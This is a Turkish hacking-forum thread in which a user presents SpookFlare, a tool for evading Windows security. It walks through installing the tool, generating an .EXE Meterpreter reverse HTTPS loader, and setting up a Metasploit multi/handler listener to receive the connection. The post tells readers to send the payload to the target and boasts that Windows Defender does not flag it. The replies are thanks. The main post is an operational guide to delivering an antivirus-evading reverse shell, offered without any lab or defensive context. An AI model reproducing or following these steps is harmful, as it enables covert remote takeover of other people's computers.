THT DUYURU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

takipci
chat
Seçenekler

SpookFlare ile Güvenlik Duvarını Aşın // Qwx

Qwx
Qwx - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
04/2012
Mesajlar:
2.730
Konular:
116
Teşekkür (Etti):
96
Teşekkür (Aldı):
616
Ticaret:
(0) %
8
2930
22-01-2019 22:47
#1
SpookFlare ile Güvenlik Duvarını Aşın // Qwx
SpookFlare

Merhaba, sizlere tanıtacağım aracın adı SpookFlare.
SpookFlare, günümüzde en fazla kullanılan işletim sistemi Windows da ki güvenlik önlemlerini aşmak adına yapılmış olan bu araç Python dili ile yazılmıştır oluşturulan payload da C# dili ile yazılmıştır. Ek olan yapımcısı bir Türk olan aracın 2.0 versiyonu ile 3 tane özellik kazandırılmıştır. Bu yeni getirilen özelliklerde PowerShell, Visual Basic Script ve Javascript ile yazılmıştır.

SpookFlare GitHub Adresi ;


https://github.com/hlldz/SpookFlare


Kurulum ;

İlk önce aracımızı sistemimize indiriyoruz.

Kod:
git clone https://github.com/hlldz/SpookFlare.git




İndirme işlemi tamamlandıktan sonra dosyanın içerisine girip pip yüklememizi gerçekleştireceğiz.


Kod:
 pip install -r requirements.txt




Evet indirme ve kurulum adı altında tüm işlemlerimiz bitmiş bulunmaktadır. Şimdi sırada aracımızı çalıştırmak ve kullanım hakkında örnek göstermek olacaktır.


Kullanım ;



Kod:
python spookflare.py





Kodu ile aracımızı açıyoruz. help kodunu yazdığımız zaman bizim karşımıza hangi komutların var olduğu çıkmaktadır. list komutu ile bu araçta neler yapabileceklerimizi görmekteyiz.

Biz bugün örneğimizde .EXE Meterpreter Reverse HTTP and HTTPS loader uygulamasını göreceğiz.


Kod:
use 1



Ardından info komutu ile bizden hangi parametreleri girmemiz istenmektedir bunu öğreniyoruz.





Evet bizden 5 tane parametre istemektedir. Protocol, Local host, Local port, İşletim sistemi biti ve Met.asploit'i entegre ettiysek onun boyutu. Bunların girişini yapıyoruz. Met.asploit'in boyutunu öğrenmek için;
/usr/share/****sploit-framework/lib/msf/core/payload/windows/x64/
bu dizine giriş sağlıyoruz ve meterpreter_loader.rb 'yi açıyoruz. Ardından en aşağıda olan #dll kısmındaki byte değerini okuyoruz.



Kod:
set PROTO https
Kod:
set LHOST <ipaddres>
set LPORT 443
set x64/x86
set SSIZE <int>
generate




Kodlarımızı tamamladık ve payload'ımız oluştu. Şimdi oluşturduğumuz payloadı karşı tarafa atıyoruz ve Met.asploit üzerinden dinlemeye başlıyoruz. Met.asploit üzerinden oluşturduğumuz payloadı dinlemek için;


Kod:
use exploit/multi/handler
Kod:
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <ipadress>
set LPORT 443
run







Karşı taraf bizim payloadımızı açtığı zaman bize bilgiler gelmektedir. Ek olarak Windows Defender payloadımız da herhangi bir virüs algılamamaktadır.





Bir araç tanıtımımızın daha sonuna gelmiş bulunmaktayız. Bir sonraki araç tanıtımında görüşmek üzere esen kalınız.
---------------------
A hacker does for love what others would not do for money.
Konu Qwx tarafından (17-03-2019 19:35 Saat 19:35 ) değiştirilmiştir.
ClayHackers2111 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2016
Mesajlar:
144
Konular:
53
Teşekkür (Etti):
18
Teşekkür (Aldı):
4
Ticaret:
(0) %
22-01-2019 23:50
#2
Eline sağlık güzel konu olmuş
RooTGHoST - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2018
Nereden:
38
Mesajlar:
1.445
Konular:
38
Teşekkür (Etti):
444
Teşekkür (Aldı):
263
Ticaret:
(0) %
22-01-2019 23:53
#3
Elinize Sağlık Emek Verilmiş Bir Konu Olmuş...
DarqRisus - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Nereden:
Nereye
Mesajlar:
165
Konular:
14
Teşekkür (Etti):
9
Teşekkür (Aldı):
13
Ticaret:
(0) %
22-01-2019 23:59
#4
Eline emeğine sağlık dostum.
--------------------- C# %39
Python %16
sessizlik235 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Mesajlar:
93
Konular:
12
Teşekkür (Etti):
0
Teşekkür (Aldı):
7
Ticaret:
(0) %
23-01-2019 00:01
#5
teşekkürler çok yararlı bir konu olmus eline sağlık
--------------------- SORUNU BENİM HAYATIN.
YİNE DE YENİDEN HAYIR DERİM.
YERDE DEĞİLİM BAYADIR.
YERDE KALAMAM BEN.
GERİDE KALAMAM BEN.
ONA BİR GÜN YENİLİP YENİDEN ÖLÜCEM.
Bİ GÜN BENDE BELKİ.
BELKİ PES ETCEM.
AMA BUGÜN DEĞİL!
AMA O GÜN BUGÜN DEĞİL!
Qwx
Qwx - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
04/2012
Mesajlar:
2.730
Konular:
116
Teşekkür (Etti):
96
Teşekkür (Aldı):
616
Ticaret:
(0) %
23-01-2019 18:53
#6
Alıntı:
ClayHackers2111´isimli üyeden Alıntı Mesajı göster
Eline sağlık güzel konu olmuş
Alıntı:
RooTGHoST´isimli üyeden Alıntı Mesajı göster
Elinize Sağlık Emek Verilmiş Bir Konu Olmuş...
Alıntı:
DarqRisus´isimli üyeden Alıntı Mesajı göster
Eline emeğine sağlık dostum.
Alıntı:
sessizlik235´isimli üyeden Alıntı Mesajı göster
teşekkürler çok yararlı bir konu olmus eline sağlık
Çok teşekkür ederim. .
---------------------
A hacker does for love what others would not do for money.
MrTarget - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2017
Mesajlar:
211
Konular:
28
Teşekkür (Etti):
46
Teşekkür (Aldı):
19
Ticaret:
(0) %
23-01-2019 19:47
#7

Eline sağlık.Yararlı konu olmuş.
Faydalı
Qwx
Qwx - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
04/2012
Mesajlar:
2.730
Konular:
116
Teşekkür (Etti):
96
Teşekkür (Aldı):
616
Ticaret:
(0) %
23-01-2019 22:17
#8
Alıntı:
MrTarget´isimli üyeden Alıntı Mesajı göster

Eline sağlık.Yararlı konu olmuş.
Faydalı
Çok teşekkür ederim . .
---------------------
A hacker does for love what others would not do for money.
"P4RS - ait Kullanıcı Resmi (Avatar)
Purple Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
19
Mesajlar:
4.833
Konular:
541
Teşekkür (Etti):
1423
Teşekkür (Aldı):
2794
Ticaret:
(0) %
23-01-2019 22:18
#9
Elinize emeğinize sağlık albayım. Güzel bir konu olmuş.
---------------------



purple-team@turkhackteam.org


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler





1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291